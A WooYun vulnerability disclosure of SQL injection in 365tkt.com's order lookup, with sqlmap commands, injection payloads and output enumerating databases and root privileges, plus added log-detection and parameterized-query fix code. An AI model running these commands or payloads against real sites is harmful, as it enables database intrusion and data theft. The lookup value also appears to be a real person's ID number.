
Vulnerability Summary

Defect ID: wooyun-2013-044739

Title: SQL injection in 365票讯网 (365tkt.com)

Vendor: 365汽车网

Author: atrino

Submitted: 2013-12-03 12:23

Fix time: 2014-01-17 12:24

Disclosed: 2014-01-17 12:24

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2013-12-03: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2014-01-17: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The order-lookup function of 365票讯网 is vulnerable to SQL injection, through which the entire contents of the back-end databases can be obtained.

Detailed description:

1. Suspected that the order-lookup function had a problem:
http://www.365tkt.com/?c=order2&a=index
POST data: eport=370325198408318026
2. Changed the POST data to eport=370325198408318026' and, sure enough, an exception appeared, so injection is essentially confirmed:
exception 'FLEA_Db_Exception_SqlQuery' with message 'SQL 错误消息: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...
3. Alex-Mac:sqlmapproject-sqlmap-7054586 mac$ python sqlmap.py -u "http://www.365tkt.com/?c=order2&a=index" --random-agent --data "eport=370325198408318026"
POST parameter 'eport' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 277 HTTP(s) requests:
---
Place: POST
Parameter: eport
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: eport=370325198408318026' RLIKE (SELECT (CASE WHEN (3777=3777) THEN 370325198408318026 ELSE 0x28 END)) AND 'vOcV'='vOcV
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: eport=370325198408318026' AND (SELECT 2087 FROM(SELECT COUNT(*),CONCAT(0x716f726171,(SELECT (CASE WHEN (2087=2087) THEN 1 ELSE 0 END)),0x71747a6371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'bjqb'='bjqb
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: eport=370325198408318026' AND 9438=BENCHMARK(5000000,MD5(0x4b594276)) AND 'TTZi'='TTZi
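The sequence above is the classic footprint of an injection probe: first a lone quote that makes the database throw a syntax error back through the application's exception handler, then a burst of automated requests (277 here) carrying RLIKE, CASE WHEN, INFORMATION_SCHEMA and BENCHMARK() constructs. Both halves are detectable on the defender's side. The script below is an added example, not part of the original report or of the 365tkt.com code base. It runs over a constructed application log whose format (timestamp, client IP, the submitted parameter, and the outcome or exception text) is an assumption for this example; the expected-format allow-list for the eport field is likewise assumed. It flags a client that produces repeated SQL syntax errors within a short window or submits values containing the payload markers seen in this report.

```python
"""Detect SQL-injection probing in application logs (added example)."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log for this example, not taken from the report.
# Format: "<date> <time> <client_ip> <param>=<value> | <outcome>"
SAMPLE_LOG = """\
2013-12-02 20:30:01 203.0.113.10 eport=370325198408318026 | ok
2013-12-02 20:30:05 203.0.113.10 eport=370325198408318026' | exception 'FLEA_Db_Exception_SqlQuery' with message 'SQL error: You have an error in your SQL syntax'
2013-12-02 20:30:06 203.0.113.10 eport=370325198408318026" | exception 'FLEA_Db_Exception_SqlQuery' with message 'SQL error: You have an error in your SQL syntax'
2013-12-02 20:30:07 203.0.113.10 eport=370325198408318026' RLIKE (SELECT (CASE WHEN (3777=3777) THEN 370325198408318026 ELSE 0x28 END)) AND 'vOcV'='vOcV | ok
2013-12-02 20:30:08 203.0.113.10 eport=370325198408318026' AND 9438=BENCHMARK(5000000,MD5(0x4b594276)) AND 'TTZi'='TTZi | ok
2013-12-02 20:30:09 203.0.113.10 eport=370325198408318026' AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.CHARACTER_SETS)>0 AND 'a'='a | ok
2013-12-02 20:31:00 198.51.100.7 eport=110101199001011234 | ok
2013-12-02 20:31:30 198.51.100.7 eport=11010119900101123X | ok
2013-12-02 20:32:00 198.51.100.7 eport=370325198408318026 | exception 'FLEA_Db_Exception_SqlQuery' with message 'SQL error: Lost connection to MySQL server'
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (\S+) (\w+)=(.*?) \| (.*)$")
# The exception class and message the report shows for a broken quote.
SQL_SYNTAX_ERROR_RE = re.compile(r"FLEA_Db_Exception_SqlQuery.*error in your SQL syntax", re.I)
# Markers drawn from the payload shapes sqlmap reported on this page.
PAYLOAD_RE = re.compile(
    r"\bRLIKE\b|\bBENCHMARK\s*\(|\bINFORMATION_SCHEMA\b|\bCASE\s+WHEN\b|'\s+(?:AND|OR)\b", re.I)
# Assumption for this example: the lookup field should be a plain alphanumeric identifier.
EXPECTED_VALUE_RE = re.compile(r"^[0-9A-Za-z]{1,32}$")


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, param, value, outcome = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "ip": ip,
            "param": param, "value": value, "outcome": outcome}


def analyze(log_text, window=timedelta(minutes=5), error_threshold=2):
    """Return per-client statistics and a flagged verdict for the whole log."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    per_ip = defaultdict(lambda: {"syntax_errors": 0, "payload_hits": 0,
                                  "malformed_values": 0, "reasons": set()})
    error_times = defaultdict(list)
    for e in events:
        s = per_ip[e["ip"]]
        if not EXPECTED_VALUE_RE.match(e["value"]):
            s["malformed_values"] += 1          # counted, but a single typo is not a verdict
        if PAYLOAD_RE.search(e["value"]):
            s["payload_hits"] += 1
            s["reasons"].add("sqli_payload_marker")
        if SQL_SYNTAX_ERROR_RE.search(e["outcome"]):
            s["syntax_errors"] += 1
            error_times[e["ip"]].append(e["ts"])
    # Several SQL syntax errors from one client inside the window is the probing signal;
    # an unrelated database error (lost connection) from a legitimate user is not.
    for ip, times in error_times.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j + 1 < len(times) and times[j + 1] - times[i] <= window:
                j += 1
            if j - i + 1 >= error_threshold:
                per_ip[ip]["reasons"].add("sql_error_burst")
                break
    return {ip: {**s, "reasons": sorted(s["reasons"]), "flagged": bool(s["reasons"])}
            for ip, s in per_ip.items()}


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_LOG), indent=2))
```

With the constructed log, 203.0.113.10 is flagged for both a syntax-error burst and payload markers, while 198.51.100.7, whose only exception is a lost connection, is not. The same two signals can be wired into the application's exception handler so that the error text is logged rather than rendered to the client, which is what made step 2 of the report so informative to the tester.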

Proof of vulnerability:

(screenshot: 1.png)


Alex-Mac:sqlmapproject-sqlmap-7054586 mac$ python sqlmap.py -u "http://www.365tkt.com/?c=order2&a=index" --random-agent --data "eport=370325198408318026" --dbs
[20:31:11] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[20:31:11] [INFO] fetching database names
[20:31:11] [INFO] the SQL query used returns 16 entries
[20:31:11] [INFO] retrieved: information_schema
[20:31:11] [INFO] retrieved: data_backup
[20:31:12] [INFO] retrieved: ies
[20:31:12] [INFO] retrieved: ies_3701010101
[20:31:12] [INFO] retrieved: ies_9999999999
[20:31:12] [INFO] retrieved: mysql
[20:31:13] [INFO] retrieved: test_sync
[20:31:13] [INFO] retrieved: web_dyzz
[20:31:13] [INFO] retrieved: web_hnsmxhh
[20:31:13] [INFO] retrieved: web_wfkyzz
[20:31:13] [INFO] retrieved: web_ytjyjt
[20:31:14] [INFO] retrieved: webim
[20:31:14] [INFO] retrieved: yuanzh
[20:31:14] [INFO] retrieved: yz118114
[20:31:14] [INFO] retrieved: yzsns
[20:31:14] [INFO] retrieved: yzweb
available databases [16]:
[*] data_backup
[*] ies
[*] ies_3701010101
[*] ies_9999999999
[*] information_schema
[*] mysql
[*] test_sync
[*] web_dyzz
[*] web_hnsmxhh
[*] web_wfkyzz
[*] web_ytjyjt
[*] webim
[*] yuanzh
[*] yz118114
[*] yzsns
[*] yzweb
database management system users privileges:
[*] 'root'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'yzuser'@'%' (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[21:04:53] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5
[21:04:53] [INFO] testing if current user is DBA
[21:04:53] [INFO] fetching current user
[21:04:54] [WARNING] reflective value(s) found and filtering out
[21:04:54] [INFO] retrieved: root@localhost
current user is DBA: True

Fix recommendation:

Filter input properly and defend carefully.
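The recommendation is terse, so here is what it amounts to in code. This is an added example, not code from the report or from the affected site; the orders table, its columns and the sample rows are constructed, and SQLite stands in for the MySQL back end because the defect is in how the query is built, not in the database product. The vulnerable function splices the submitted value into the SQL string, which is the pattern the report's step 2 implies: a lone quote breaks the statement, and a boolean payload of the shape sqlmap used changes its logic. The safe function passes the value as a bound parameter, and the hardened wrapper additionally rejects values outside an assumed alphanumeric allow-list before they reach the database.

```python
"""Vulnerable string concatenation beside the parameterized fix (added example)."""
import re
import sqlite3


def make_demo_db():
    """Constructed sample data for this example; the real site's schema is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER PRIMARY KEY, eport TEXT NOT NULL, ticket TEXT NOT NULL)")
    conn.executemany("INSERT INTO orders (eport, ticket) VALUES (?, ?)",
                     [("370325198408318026", "T-1001"), ("110101199001011234", "T-1002")])
    return conn


def lookup_vulnerable(conn, eport):
    """The flawed pattern: user input becomes part of the SQL text."""
    sql = f"SELECT ticket FROM orders WHERE eport = '{eport}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, eport):
    """Parameterized query: the driver sends the value separately, so it is never parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT ticket FROM orders WHERE eport = ?", (eport,))]


# Assumption for this example: the lookup field is a plain alphanumeric identifier.
EPORT_RE = re.compile(r"^[0-9A-Za-z]{1,32}$")


def lookup_hardened(conn, eport):
    """Defense in depth: validate the shape of the input, then use the parameterized query."""
    if not EPORT_RE.match(eport):
        raise ValueError("malformed lookup value")
    return lookup_safe(conn, eport)


def demo():
    """Run the same inputs through each variant and collect the outcomes."""
    conn = make_demo_db()
    quote_probe = "370325198408318026'"                    # the report's step 2
    bool_probe = "370325198408318026' AND 'vOcV'='vOcV"    # shape of the boolean-based payload
    results = {"safe_exact": lookup_safe(conn, "370325198408318026")}
    try:
        lookup_vulnerable(conn, quote_probe)
        results["vulnerable_quote"] = "no error"
    except sqlite3.OperationalError:
        results["vulnerable_quote"] = "syntax error"        # what the tester saw in the exception
    results["safe_quote"] = lookup_safe(conn, quote_probe)  # the quote is just data: no match
    results["vulnerable_bool"] = lookup_vulnerable(conn, bool_probe)  # condition is true: row returned
    results["safe_bool"] = lookup_safe(conn, bool_probe)              # literal string: no match
    try:
        lookup_hardened(conn, bool_probe)
        results["hardened_bool"] = "accepted"
    except ValueError:
        results["hardened_bool"] = "rejected"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The parameterized version is the actual fix; the allow-list only narrows what can be attempted. The proof section also shows the application connecting as root with all 27 privileges, FILE and SUPER included, and sqlmap confirming that the current user is a DBA. A dedicated database account limited to the statements the order lookup needs would not have prevented the injection, but it would have kept a single flaw in one form from exposing all sixteen databases.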

Copyright notice: please credit the source, atrino@乌云, when republishing.


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively refused to respond.